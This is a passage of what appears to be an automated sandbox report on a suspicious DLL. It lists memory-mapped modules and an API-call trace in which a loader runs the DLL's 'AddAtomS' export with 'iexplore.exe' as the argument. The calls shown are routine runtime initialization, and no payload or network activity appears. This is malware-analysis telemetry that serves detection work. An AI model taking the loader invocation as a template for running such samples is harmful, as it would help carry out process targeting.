"shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2562 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2563 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2564 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2565 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2566 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2567 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2568 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2569 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2570 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2571 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 2572 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2573 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2574 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2575 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2576 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 2577 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2578 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2579 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 2580 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2581 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2582 start_va = 0x3e0000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 2583 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2584 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2585 start_va = 0x1200000 end_va = 0x13cffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Thread: id = 122 os_tid = 0xd40 [0035.560] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f6c4 | out: lpSystemTimeAsFileTime=0x18f6c4*(dwLowDateTime=0xe2e16610, dwHighDateTime=0x1d3dfba)) [0035.560] GetCurrentProcessId () returned 0xd3c [0035.560] GetCurrentThreadId () returned 0xd40 [0035.560] GetTickCount () returned 0x18036 [0035.560] QueryPerformanceCounter (in: lpPerformanceCount=0x18f6bc | out: lpPerformanceCount=0x18f6bc*=374790062) returned 1 [0035.560] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.560] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0035.560] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0035.560] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0035.560] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0035.560] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.560] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.561] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.561] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.561] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.561] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.561] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.561] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.561] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.561] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.561] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.561] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.561] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.561] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.562] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.562] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.562] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.562] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.562] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.562] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.562] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.562] GetCurrentThreadId () returned 0xd40 [0035.562] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomS /fn_args=\"iexplore.exe\"" [0035.562] GetEnvironmentStringsW () returned 0x2278f0* [0035.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0035.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x4609f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0035.562] FreeEnvironmentStringsW (penv=0x2278f0) returned 1 [0035.562] GetStartupInfoA (in: lpStartupInfo=0x18f614 | out: lpStartupInfo=0x18f614*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0035.563] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0035.563] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0035.563] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0035.563] SetHandleCount (uNumber=0x20) returned 0x20 [0035.563] GetLastError () returned 0x0 [0035.563] SetLastError (dwErrCode=0x0) [0035.563] GetLastError () returned 0x0 [0035.563] SetLastError (dwErrCode=0x0) [0035.563] GetLastError () returned 0x0 [0035.563] SetLastError (dwErrCode=0x0) [0035.563] GetACP () returned 0x4e4 [0035.563] GetLastError () returned 0x0 [0035.563] SetLastError (dwErrCode=0x0) [0035.563] IsValidCodePage (CodePage=0x4e4) returned 1 [0035.563] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f5f4 | out: lpCPInfo=0x18f5f4) returned 1 [0035.563] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f0c0 | out: lpCPInfo=0x18f0c0) returned 1 [0035.563] GetLastError () returned 0x0 [0035.563] SetLastError (dwErrCode=0x0) [0035.563] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f050 | out: lpCharType=0x18f050) returned 1 [0035.563] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f4d4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.563] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f4d4, cbMultiByte=256, lpWideCharStr=0x18ee38, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.563] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f0d4 | out: lpCharType=0x18f0d4) returned 1 [0035.563] GetLastError () returned 0x0 [0035.563] SetLastError (dwErrCode=0x0) [0035.563] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0035.563] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f4d4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.563] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f4d4, cbMultiByte=256, lpWideCharStr=0x18ee08, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā") returned 256 [0035.563] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0035.563] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x18ebf8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.563] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18f3d4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x16³hô\x0cö\x18", lpUsedDefaultChar=0x0) returned 256 [0035.564] GetLastError () returned 0x0 [0035.564] SetLastError (dwErrCode=0x0) [0035.564] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f4d4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.564] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f4d4, cbMultiByte=256, lpWideCharStr=0x18ee28, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā") returned 256 [0035.564] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0035.564] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x18ec18, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0035.564] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18f2d4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x16³hô\x0cö\x18", lpUsedDefaultChar=0x0) returned 256 [0035.564] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.564] GetLastError () returned 0x0 [0035.564] SetLastError (dwErrCode=0x0) [0035.564] GetLastError () returned 0x0 [0035.564] SetLastError (dwErrCode=0x0) [0035.564] GetLastError () returned 0x0 [0035.564] SetLastError (dwErrCode=0x0) [0035.564] GetLastError () returned 0x0 [0035.564] SetLastError (dwErrCode=0x0) [0035.564] GetLastError () returned 0x0 [0035.564] SetLastError (dwErrCode=0x0) [0035.564] GetLastError () returned 0x0 [0035.564] SetLastError (dwErrCode=0x0) [0035.564] GetLastError () returned 0x0 [0035.564] SetLastError (dwErrCode=0x0) [0035.564] GetLastError () returned 0x0 [0035.564] SetLastError (dwErrCode=0x0) [0035.564] GetLastError () returned 0x0 [0035.564] SetLastError (dwErrCode=0x0) [0035.564] GetLastError () returned 0x0 [0035.564] SetLastError (dwErrCode=0x0) [0035.564] GetLastError () returned 0x0 [0035.564] SetLastError (dwErrCode=0x0) [0035.564] GetLastError () returned 0x0 [0035.565] SetLastError (dwErrCode=0x0) [0035.565] GetLastError () returned 0x0 [0035.565] SetLastError (dwErrCode=0x0) [0035.565] GetLastError () returned 0x0 [0035.565] SetLastError (dwErrCode=0x0) [0035.565] GetLastError () returned 0x0 [0035.565] SetLastError (dwErrCode=0x0) [0035.565] GetLastError () returned 0x0 [0035.565] SetLastError (dwErrCode=0x0) [0035.565] GetLastError () returned 0x0 [0035.565] SetLastError (dwErrCode=0x0) [0035.565] GetLastError () returned 0x0 [0035.565] SetLastError (dwErrCode=0x0) [0035.565] GetLastError () returned 0x0 [0035.565] SetLastError (dwErrCode=0x0) [0035.565] GetLastError () returned 0x0 [0035.565] SetLastError 